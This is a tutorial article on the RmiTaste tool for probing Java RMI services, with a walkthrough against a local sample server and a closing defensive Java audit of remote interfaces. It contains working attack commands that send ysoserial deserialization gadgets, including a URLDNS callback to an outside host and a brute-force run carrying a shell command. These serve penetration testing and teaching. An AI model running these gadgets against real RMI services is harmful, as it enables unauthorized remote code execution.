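This article introduces RmiTaste and what it is used for. Most readers are probably not yet familiar with it, so the article is offered as a reference. Let's take a look.
RmiTaste helps security researchers detect, enumerate, interact with and attack RMI services by calling remote methods with gadgets from ysoserial. It also lets us call remote methods with specific parameters.
RmiTaste's main purpose is to help security professionals identify insecure RMI services on target systems. Unauthorized access to a target computer system is illegal, so RmiTaste must only be used in lawful settings.
Note: this tool requires OpenJDK v11.0.3 to run.
First, download ysoserial-master-SNAPSHOT.jar and store it in the libs_attack directory. It is available from: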
https://github.com/frohoff/ysoserial
Second, build the project with Maven:
mvn package
Next, run the following command:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
    @author Marcin Ogorzelski (mzero - @_mzer0)
    STM Solutions
    Warning: RmiTaste was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
RmiTaste provides four modes: conn, enum, attack and call. Each mode has its own help menu:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
    (...)
    Usage: <main class> [-h] [COMMAND]
      -h, --help   Show this help message
    Commands:
      conn    Check the connection to the host
      enum    Enumerate the RMI service
      attack  Attack RMI registry methods
      call    Call a specific method of an RMI remote object
The conn mode lets us determine whether the target port is an RMI service port:
# Check if 127.0.0.1:1099 is RMI Service
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099
The enum mode lets researchers obtain information about an RMI service, such as the remote object names and the names of the classes that the remote objects implement and extend. If the interface implemented by a remote object is accessible on the RmiTaste classpath, RmiTaste prints all of its remote methods and lets us call them directly:
# RMI service enumeration
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
The attack mode calls remote methods using specific gadget chains from ysoserial. Suppose the remote object has the following methods:
    acc1 [object] [127.0.1.1:38293]
        implements java.rmi.Remote [interface]
        extends java.lang.reflect.Proxy [class]
        implements m0.rmitaste.example.server.ClientAccount [interface]
            setPin(java.lang.String param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            getBalance(); [method]
            deposit(java.lang.Object param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            withdraw(float param0); [method]
# Call all remote methods with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"
The "-gen bruteforce" option additionally lets us brute-force a remote method:
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"
The call mode lets us call a specific method of an RMI remote object. Suppose the remote object has the following methods:
    acc1 [object] [127.0.1.1:38293]
        implements java.rmi.Remote [interface]
        extends java.lang.reflect.Proxy [class]
        implements m0.rmitaste.example.server.ClientAccount [interface]
            setPin(java.lang.String param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            getBalance(); [method]
            deposit(java.lang.Object param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            withdraw(float param0); [method]
# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"
# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234"
Click [here] to get the sample server.
First, run the sample server.
Next, enumerate the objects:
root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
    acc1 [object] [127.0.1.1:42881]
        extends java.rmi.server.RemoteObjectInvocationHandler [class]
        implements java.rmi.Remote [interface]
        extends java.lang.reflect.Proxy [class]
        extends java.rmi.server.RemoteObject [class]
        implements m0.rmitaste.example.server.ClientAccount [interface]
            No methods found. I don't have remote object interface. Give it to me!
    acc2 [object] [127.0.1.1:42881]
        extends java.rmi.server.RemoteObjectInvocationHandler [class]
        implements java.rmi.Remote [interface]
        extends java.lang.reflect.Proxy [class]
        extends java.rmi.server.RemoteObject [class]
        implements m0.rmitaste.example.server.ClientAccount [interface]
            No methods found. I don't have remote object interface. Give it to me!
As you can see, RmiTaste needs the remote object's interface. During a penetration test we would also have to find these interfaces ourselves. In this example, it is enough to copy rmitaste.examples-1.0-SNAPSHOT-all.jar into the libs_attack directory. The enumeration output then looks like this:
    acc1 [object] [127.0.1.1:42881]
        extends java.rmi.server.RemoteObjectInvocationHandler [class]
        implements java.rmi.Remote [interface]
        extends java.lang.reflect.Proxy [class]
        extends java.rmi.server.RemoteObject [class]
        implements m0.rmitaste.example.server.ClientAccount [interface]
            setPin(java.lang.String param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            getBalance(); [method]
            deposit(java.lang.Object param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            withdraw(float param0); [method]
    acc2 [object] [127.0.1.1:42881]
        extends java.rmi.server.RemoteObjectInvocationHandler [class]
        implements java.rmi.Remote [interface]
        extends java.lang.reflect.Proxy [class]
        extends java.rmi.server.RemoteObject [class]
        implements m0.rmitaste.example.server.ClientAccount [interface]
            setPin(java.lang.String param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            getBalance(); [method]
            deposit(java.lang.Object param0); [method]
                Parameters: param0; may be vulnerable to Java Deserialization! [info]
            withdraw(float param0); [method]
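For teams that own an RMI service, the same kind of review can be run against their own interfaces before deployment. The following is an added example, not code from RmiTaste or from the original article: it lists every remote-method parameter that is not a primitive, which matches the pattern of "[info]" flags in the output above (setPin and deposit flagged, withdraw and getBalance not). The nested ClientAccount interface and its return types are constructed stand-ins, and the "non-primitive parameter" rule is an assumption inferred from that output.

```java
import java.lang.reflect.Method;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.List;

public class RemoteInterfaceAudit {

    // Constructed stand-in with the method names and parameter types shown in
    // the enumeration output; return types are assumed, not taken from the page.
    interface ClientAccount extends Remote {
        void setPin(String pin) throws RemoteException;
        float getBalance() throws RemoteException;
        void deposit(Object amount) throws RemoteException;
        void withdraw(float amount) throws RemoteException;
    }

    // Assumed heuristic: a primitive argument is read directly from the call
    // stream, while any other declared type reaches the server as a serialized
    // object, so those parameters are the ones to review.
    static List<String> objectTypedParameters(Class<? extends Remote> iface) {
        List<String> findings = new ArrayList<>();
        for (Method m : iface.getMethods()) {       // includes methods of super-interfaces
            Class<?>[] types = m.getParameterTypes();
            for (int i = 0; i < types.length; i++) {
                if (!types[i].isPrimitive()) {      // String, Object, arrays, boxed types
                    findings.add(m.getName() + " param" + i + ": "
                            + types[i].getTypeName());
                }
            }
        }
        findings.sort(null);                        // getMethods() order is unspecified
        return findings;
    }

    public static void main(String[] args) {
        List<String> findings = objectTypedParameters(ClientAccount.class);
        if (findings.isEmpty()) {
            System.out.println("No object-typed parameters found.");
        }
        for (String finding : findings) {
            System.out.println("review: " + finding);
        }
    }
}
```

Parameters reported here are candidates for narrowing to primitive types or for protection with a serialization filter on the exported object.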